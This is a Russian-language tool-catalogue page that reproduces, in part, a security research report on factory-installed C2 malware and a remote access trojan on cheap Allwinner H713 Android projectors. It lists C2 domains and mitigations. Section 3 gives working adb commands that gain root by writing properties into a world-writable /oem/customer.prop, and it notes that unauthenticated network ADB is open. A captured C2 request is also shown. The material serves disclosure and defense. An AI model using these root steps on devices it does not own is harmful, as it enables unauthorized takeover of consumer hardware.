Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Android-Projector-C2-Malware — Разбор C2-сети китайских beamers — SilentSDK-Analysis | Kitploit
Инструменты/GitHubGitHub/kavan00/android-projector-c2-malware
Безопасность AndroidБезопасность встроенных системУправление индикаторами компрометации (IOC)Безопасность IoTСетевая криминалистикаОбратная инженерияАнализ вредоносных программЦифровая криминалистика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Командование и Управление
Разведка угроз
Безопасность Цепочки Поставок
Анализ Прошивок
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

Разбор C2-сети китайских beamers — SilentSDK-Analysis

Репозиторий
182655 месяцев назадЕщё не проверено
Поделиться

Предустановленная C2-инфраструктура и RAT-нагрузка на Android-проекторах

Технический отчет — Исследование безопасности


Затронутые устройства: Множество Android-проекторов брендов, таких как Nonete (например, модель HY260Pro) (вероятно, также несколько проекторов от Magcubic, Hotack, Huyukang и многих других, так как эти компании распространяют похожие модели, и есть подтверждающие признаки)
Платформа чипсета: Allwinner H713 / sun50iw12p1 — потенциально затрагивает все устройства на этой платформе
Период анализа: 11–17 апреля 2026 г.
Классификация: Предустановленная Command-and-Control инфраструктура с нагрузкой Remote Access Trojan


TL;DR

  • Проблема: Многочисленные дешевые Android-проекторы (возможно, бренды Magcubic, Hotack и др., использующие чип Allwinner H713), в настоящее время массово продаваемые на Amazon, eBay и AliExpress, заражены вредоносным ПО прямо с завода (Supply Chain Attack, аналогично случаям «BADBOX»).
  • Механизм: Безобидное на вид системное приложение («StoreOS») выступает в роли замаскированного дроппера. Оно полностью незаметно загружает Stage-2-дроппер с именем «SilentSDK» в фоне и устанавливает его с максимальными системными привилегиями, который, в свою очередь, устанавливает модульный, плагинный, архитектурно-осведомленный RAT и, возможно, фишинговый фреймворк.
  • Опасность: Вредоносное ПО устанавливает C2-соединение с Китаем (api.pixelpioneerss.com), извлекает конфиденциальные идентификаторы устройств и может в любой момент загружать и выполнять любой дополнительный вредоносный код с привилегиями root (chmod 777). Кроме того, на устройствах присутствуют открытые бэкдоры root.
  • Немедленные меры: C2-домены (особенно *.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) должны быть заблокированы на сетевом уровне. Пострадавшие пользователи могут только отключить вредоносные приложения вручную через ADB, поскольку они глубоко встроены в систему.

Уведомление о срочности

Вредоносная инфраструктура, описанная в этом отчете, предустановлена на Android-проекторах, которые в настоящее время продаются в больших количествах конечным потребителям на Amazon, eBay и AliExpress. Затронутые устройства могут относиться к нескольким брендам (Hotack, Huyukang, Magcubic, Nonete и др.). Идентичная C2-инфраструктура независимо подтверждена на других устройствах того же производителя (см. раздел 13). Характер совпадает с случаями BADBOX.


Содержание

  1. Идентификация устройства
  2. Рабочий процесс исследования
  3. Root-доступ — путь эксплуатации
  4. Ответ C2-сервера — ключевое доказательство
  5. Обзор экосистемы вредоносного ПО
  6. StoreOS — анализ дроппера (com.htc.storeos)
  7. EventUploadService — телеметрия (com.htc.eventuploadservice)
  8. ExpandSDK — инъекция рекламы (com.htc.expandsdk)
  9. SilentSDK — анализ Stage-2-дроппера (com.hotack.silentsdk)
  10. Вредоносное ПО
  11. Системные бэкдоры
  12. Сетевая криминалистика
  13. Подмена устройства (подмена Build Fingerprint)
  14. Внешнее подтверждение
  15. Индикаторы компрометации (IOCs)
  16. Сопоставление с MITRE ATT&CK
  17. Немедленные меры смягчения
  18. Источники

Приобретенное устройство: Ссылка на Amazon - Nonete Mini Beamer 4K 1080P


1. Идентификация устройства

СвойствоЗначение
БрендNonete HY260Pro (модель, продаваемая несколькими компаниями)
Внутреннее имя моделиNT10
SoCAllwinner sun50iw12p1 (ARM 32-bit)
Операционная системаSpectraOS (Android 11, Kernel 5.4.99)
Реальный Build FingerprintAllwinner/h713_tuna_p3/h713-tuna_p3:11
Подмененный Build FingerprintADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxPermissive (без принудительного применения)
Ключ подписи платформыПубличный AOSP Test Key
OEM-сертификатCN=蓝鲨, OU=www.bsh.me, C=CN
ПрошивкаHY260Pro_SpectraOS_TPYB

Примечание о масштабе: Чипсет Allwinner H713 встроен во множество дешевых Android-проекторов, продаваемых под сменяющимися брендами на европейском рынке. Идентичная база прошивки (h713_tuna_p3) и идентичный C2-оператор (Shenzhen Aodin Technology) убедительно свидетельствуют о том, что все устройства этого OEM-производителя содержат одну и ту же инфраструктуру.


2. Рабочий процесс исследования

ШагДействиеРезультат
1Захват трафика WiresharkHTTP-трафик на store-api.aodintech.com
2Декодирование сжатого gzip ответа C27 приложений, включая скрытое «SilentTools»
3AES-CBC дешифрование пути загрузкиКлюч [REDACTED], URL к .bpp файлу
4Root-эксплойт через /oem/customer.propuid=0(root) после инъекции свойств
5Криминалистический дамп /data, /oem, /systemAPK, базы данных, конфигурации
6Статический анализ DEX StoreOSpm install -r -d, защита от реверс-инжиниринга
7Обратное проектирование механизма reverseLenПонимание защиты от анализа
8Взлом защиты от реверс-инжинирингаРасшифрованный, анализируемый DEX SilentSDK
9XOR-дешифрование строк SilentSDKДомен C2 api.pixelpioneerss.com подтвержден
10Проверка хеша из трех источниковMD5/SHA-256 полностью совпадают
11Обратное проектирование процесса загрузки вредоносного ПОСерверы все еще активны
12Обратное проектирование вредоносного ПОПлагинный RAT-фреймворк

3. Root-доступ — путь эксплуатации

Root-доступ был получен через комбинацию трех уязвимостей:

  1. SELinux Permissive — Нарушения доступа только логируются, не блокируются.
  2. Раздел /oem доступен для записи всем — Раздел смонтирован как FAT с fmask=0000.
  3. customer.prop загружается при загрузке — Перезаписывает системные свойства.```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**Воздействие:** Любой пользователь, имеющий физический доступ, или злоумышленник в той же сети (через ADB, порт 5555 открыт, без аутентификации) получает полный root-доступ.

---

## 4. Ответ C2-сервера — Основные доказательства

### Захваченный HTTP-запрос```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

Ответ сервера (Декодировано из pcapng - Таблица)

Сжатый gzip ответ содержит JSON список из семи приложений. Шесть из них — обычные стриминговые приложения (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). Седьмое — SilentTools:

ПриложениеПакетisShowisForceisSilent InstallisSilent UninstallТип запуска
YouTubecom.google.android.youtube.tvtruefalsefalsefalse0
Disney+com.disney.disneyplustruefalsefalsefalse0
Netflixcom.netflix.mediaclienttruefalsefalsefalse0
Chromecom.android.chrometruefalsefalsefalse0
Prime Videocom.amazon.amazonvideo.livingroomtruefalsefalsefalse0
BrowseHerecom.tcl.browsertruefalsefalsefalse0
SilentToolscom.hotack.silentsdkfalsetruefalsetrue1
Скачать инструмент